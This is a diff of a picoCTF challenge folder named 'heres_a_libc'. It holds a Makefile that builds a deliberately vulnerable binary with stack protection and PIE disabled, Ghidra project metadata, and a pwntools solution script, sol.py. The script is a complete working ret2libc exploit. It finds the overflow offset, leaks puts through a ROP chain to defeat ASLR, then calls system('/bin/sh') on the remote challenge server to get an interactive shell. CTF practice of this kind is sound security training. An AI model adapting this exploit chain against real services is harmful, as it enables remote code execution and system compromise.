Here's a libc

heres_a_libc/Makefile

@@ -0,0 +1,5 @@
+all:
+	gcc -Xlinker -rpath=./ -m64 -fno-stack-protector -no-pie -o vuln vuln.c
+
+clean:
+	rm vuln

heres_a_libc/heres_a_libc.rep/idata/00/00000001.prp

@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="Program" />
+        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
+        <STATE NAME="FILE_ID" TYPE="string" VALUE="19ef4b6e74214007714427800" />
+        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
+        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
+        <STATE NAME="NAME" TYPE="string" VALUE="vuln_patched" />
+    </BASIC_INFO>
+</FILE_INFO>

heres_a_libc/heres_a_libc.rep/idata/00/00000002.prp

@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="Program" />
+        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
+        <STATE NAME="FILE_ID" TYPE="string" VALUE="19ef4b6e98915179083947600" />
+        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
+        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
+        <STATE NAME="NAME" TYPE="string" VALUE="libc.so.6" />
+    </BASIC_INFO>
+</FILE_INFO>

heres_a_libc/heres_a_libc.rep/idata/~index.bak

@@ -0,0 +1,6 @@
+VERSION=1
+/
+  00000002:libc.so.6:19ef4b6e98915179083947600
+  00000001:vuln_patched:19ef4b6e74214007714427800
+NEXT-ID:3
+MD5:d41d8cd98f00b204e9800998ecf8427e

heres_a_libc/heres_a_libc.rep/idata/~index.dat

@@ -0,0 +1,6 @@
+VERSION=1
+/
+  00000002:libc.so.6:19ef4b6e98915179083947600
+  00000001:vuln_patched:19ef4b6e74214007714427800
+NEXT-ID:3
+MD5:d41d8cd98f00b204e9800998ecf8427e

heres_a_libc/heres_a_libc.rep/project.prp

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="OWNER" TYPE="string" VALUE="MaximeVorwerk" />
+    </BASIC_INFO>
+</FILE_INFO>

heres_a_libc/heres_a_libc.rep/projectState

@@ -0,0 +1,15 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<PROJECT>
+    <PROJECT_DATA_XML_NAME NAME="DISPLAY_DATA">
+        <SAVE_STATE>
+            <ARRAY NAME="EXPANDED_PATHS" TYPE="string">
+                <A VALUE="heres_a_libc:" />
+            </ARRAY>
+            <STATE NAME="SHOW_TABLE" TYPE="boolean" VALUE="false" />
+        </SAVE_STATE>
+    </PROJECT_DATA_XML_NAME>
+    <TOOL_MANAGER ACTIVE_WORKSPACE="Workspace">
+        <WORKSPACE NAME="Workspace" ACTIVE="true" />
+    </TOOL_MANAGER>
+</PROJECT>
+

heres_a_libc/heres_a_libc.rep/user/00/00000001.prp

@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="ProgramUserData" />
+        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
+        <STATE NAME="FILE_ID" TYPE="string" VALUE="19ef4b6e74714020607205000" />
+        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
+        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
+        <STATE NAME="NAME" TYPE="string" VALUE="udf_19ef4b6e74214007714427800" />
+    </BASIC_INFO>
+</FILE_INFO>

heres_a_libc/heres_a_libc.rep/user/00/00000002.prp

@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="ProgramUserData" />
+        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
+        <STATE NAME="FILE_ID" TYPE="string" VALUE="19ef4b6e9ba15286089422300" />
+        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
+        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
+        <STATE NAME="NAME" TYPE="string" VALUE="udf_19ef4b6e98915179083947600" />
+    </BASIC_INFO>
+</FILE_INFO>

heres_a_libc/heres_a_libc.rep/user/~index.bak

@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:0
+MD5:d41d8cd98f00b204e9800998ecf8427e

heres_a_libc/heres_a_libc.rep/user/~index.dat

@@ -0,0 +1,6 @@
+VERSION=1
+/
+  00000001:udf_19ef4b6e74214007714427800:19ef4b6e74714020607205000
+  00000002:udf_19ef4b6e98915179083947600:19ef4b6e9ba15286089422300
+NEXT-ID:3
+MD5:d41d8cd98f00b204e9800998ecf8427e

heres_a_libc/heres_a_libc.rep/user/~journal.bak

@@ -0,0 +1,7 @@
+IADD:00000000:/udf_19ef4b6e72713942339862900
+IDSET:/udf_19ef4b6e72713942339862900:19ef4b6e73013958061907200
+IADD:00000001:/udf_19ef4b6e74214007714427800
+IDSET:/udf_19ef4b6e74214007714427800:19ef4b6e74714020607205000
+IDEL:/udf_19ef4b6e72713942339862900
+IADD:00000002:/udf_19ef4b6e98915179083947600
+IDSET:/udf_19ef4b6e98915179083947600:19ef4b6e9ba15286089422300

heres_a_libc/heres_a_libc.rep/versioned/~index.bak

@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:0
+MD5:d41d8cd98f00b204e9800998ecf8427e

heres_a_libc/heres_a_libc.rep/versioned/~index.dat

@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:0
+MD5:d41d8cd98f00b204e9800998ecf8427e

heres_a_libc/sol.py

@@ -0,0 +1,61 @@
+#!/home/maxime/.pyvenv/bin/python3
+
+from pwn import *
+
+exe = ELF("./vuln_patched")
+libc = ELF("./libc.so.6")
+ld = ELF("./ld-2.27.so")
+
+context.binary = exe
+
+
+def conn():
+    if args.LOCAL:
+        r = process(exe.path)
+        if args.DEBUG:
+            gdb.attach(r)
+    else:
+        r = remote("mercury.picoctf.net", 23584)
+
+    return r
+
+def get_offset():
+    os.system("rm core.* > /dev/null")
+    proc = process(exe.path)
+    payload = cyclic(150, n=exe.bytes)
+    proc.sendlineafter(b"WeLcOmE To mY EcHo sErVeR!\n", payload)
+    proc.wait()
+    offset = cyclic_find(proc.corefile.fault_addr, n=exe.bytes)
+    log.info("offset: {}".format(offset))
+    return offset
+
+offset = get_offset()
+
+rop = ROP(exe)
+rop.call("puts",[exe.got['puts']])
+rop.do_stuff()
+
+payload = flat({offset: bytes(rop)})
+
+r = conn()
+r.sendlineafter(b"WeLcOmE To mY EcHo sErVeR!\n", payload)
+r.recvline()
+
+puts_addr = int.from_bytes(r.recvline(keepends=False), 'little')
+
+libc.address = puts_addr - libc.symbols['puts']
+log.info("libc address: {}".format(hex(libc.address)))
+
+rop = ROP(exe)
+rop.call('puts', [exe.got['puts']])
+rop.call(libc.symbols["system"], [next(libc.search(b"/bin/sh"))])
+
+payload = flat({offset: bytes(rop)})
+log.info("payload: \n{}".format(hexdump(payload)))
+
+r.sendline(payload)
+r.recvline()
+r.recvline()
+
+r.interactive()
+